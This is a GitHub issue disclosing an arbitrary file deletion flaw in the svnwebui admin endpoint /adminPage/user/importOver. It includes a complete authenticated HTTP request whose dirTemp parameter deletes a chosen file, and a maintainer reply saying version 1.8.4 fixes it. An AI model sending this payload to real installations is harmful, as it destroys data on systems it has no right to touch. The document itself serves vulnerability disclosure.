The svnwebui system has an arbitrary file deletion vulnerability #8
Comments
|
ok, I will fix this |
|
1.8.4 fix this |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
com.cym.controller.UserController#importOver
The system did not perform a security check on the parameter dirTemps,which allowed attackers to construct payloads and cause arbitrary file deletion
step in FileUtil.del,which could delete any file.
The following is the process of reproducing vulnerabilities:
The current path contains the file test:
After logging into the system,using this payload
`POST /adminPage/user/importOver HTTP/1.1
Host: 192.168.31.227:6060
Content-Length: 27
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.227:6060
Referer: http://192.168.31.227:6060/adminPage/user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=c898caf824614a45a7032dc54291697d; Hm_lvt_2358d52bb43b2c7c42cb5a060c736de6=1712677313; Hm_lpvt_2358d52bb43b2c7c42cb5a060c736de6=1712677380
Connection: close
dirTemp=/home/svnWebUI/test`
The file has been deleted now
The text was updated successfully, but these errors were encountered: